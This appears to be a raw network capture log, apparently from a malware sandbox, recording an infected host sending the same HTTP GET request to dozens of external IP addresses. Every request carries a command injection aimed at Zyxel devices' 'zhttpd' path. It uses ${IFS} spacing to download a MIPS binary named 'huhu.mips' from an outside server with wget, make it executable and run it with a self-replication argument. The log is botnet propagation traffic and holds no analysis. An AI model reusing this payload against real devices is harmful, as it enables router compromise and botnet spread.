                                              Jan 29, 2024 07:04:02.255352974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7409192.168.2.1440346221.244.198.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255397081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7410192.168.2.145013836.73.145.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255429029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7411192.168.2.143343496.164.218.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255467892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7412192.168.2.1444064178.10.79.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255515099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7413192.168.2.145603884.239.255.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255527020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7414192.168.2.144945490.76.166.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255557060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7415192.168.2.1450476188.194.123.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255598068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7416192.168.2.144558653.44.239.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255642891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7417192.168.2.1459124123.232.74.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255691051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7418192.168.2.1437418197.2.143.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255722046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7419192.168.2.144863279.47.60.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255763054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7420192.168.2.145645831.38.63.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255805969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7421192.168.2.143408034.242.37.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255826950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7422192.168.2.145605088.160.119.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255851030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7423192.168.2.1445874157.153.192.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255898952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7424192.168.2.1453082186.231.171.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255930901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7425192.168.2.1438656120.50.158.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255949020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7426192.168.2.145159299.209.102.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255989075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7427192.168.2.1456404179.217.2.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256040096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7428192.168.2.145985677.19.188.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256062984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7429192.168.2.145512641.99.35.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256127119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7430192.168.2.145345869.221.207.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256175041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7431192.168.2.143454495.253.71.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256205082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7432192.168.2.1454836125.191.251.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256247044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7433192.168.2.145716264.73.203.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256300926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7434192.168.2.144790496.74.229.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256335974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7435192.168.2.1460352146.107.12.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256365061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7436192.168.2.1450892196.142.231.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256400108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7437192.168.2.145186073.233.32.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256438017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7438192.168.2.145218695.140.17.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256464958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7439192.168.2.146009614.116.1.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256498098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7440192.168.2.1434010193.69.221.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256540060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7441192.168.2.1447918129.226.249.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256582022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7442192.168.2.145294866.253.248.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256624937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7443192.168.2.1436192103.142.238.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256644964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7444192.168.2.1440084153.16.69.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256700993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7445192.168.2.1443216144.119.60.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256737947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7446192.168.2.1445936192.40.230.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256767988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7447192.168.2.1459444119.139.91.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256817102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7448192.168.2.1450802147.192.55.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256819963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7449192.168.2.145810640.100.166.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256870985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7450192.168.2.146037476.204.148.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256900072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7451192.168.2.1433976189.117.210.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256930113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7452192.168.2.143454647.48.124.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256959915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7453192.168.2.1457100135.83.253.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.256995916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7454192.168.2.144371245.232.163.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257016897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7455192.168.2.144594491.150.175.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257074118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7456192.168.2.1437618199.183.64.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257105112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7457192.168.2.143969474.126.200.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257150888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7458192.168.2.1433408136.64.30.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257189035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7459192.168.2.144941842.134.150.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257225037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7460192.168.2.1441030101.125.166.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257250071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7461192.168.2.1434592154.136.21.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257293940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7462192.168.2.145554834.229.232.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257319927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7463192.168.2.1445364132.9.54.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257375002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7464192.168.2.143590883.195.16.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257405996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7465192.168.2.1445284134.179.1.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257433891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7466192.168.2.1453400158.113.113.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257479906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7467192.168.2.1435390199.37.120.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257533073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7468192.168.2.144872454.68.132.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257567883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7469192.168.2.1454246200.162.0.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257601023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7470192.168.2.1445044130.136.69.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257651091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7471192.168.2.145493651.103.19.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257702112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7472192.168.2.143781894.162.20.244443
                                              TimestampBytes transferredDirectionData
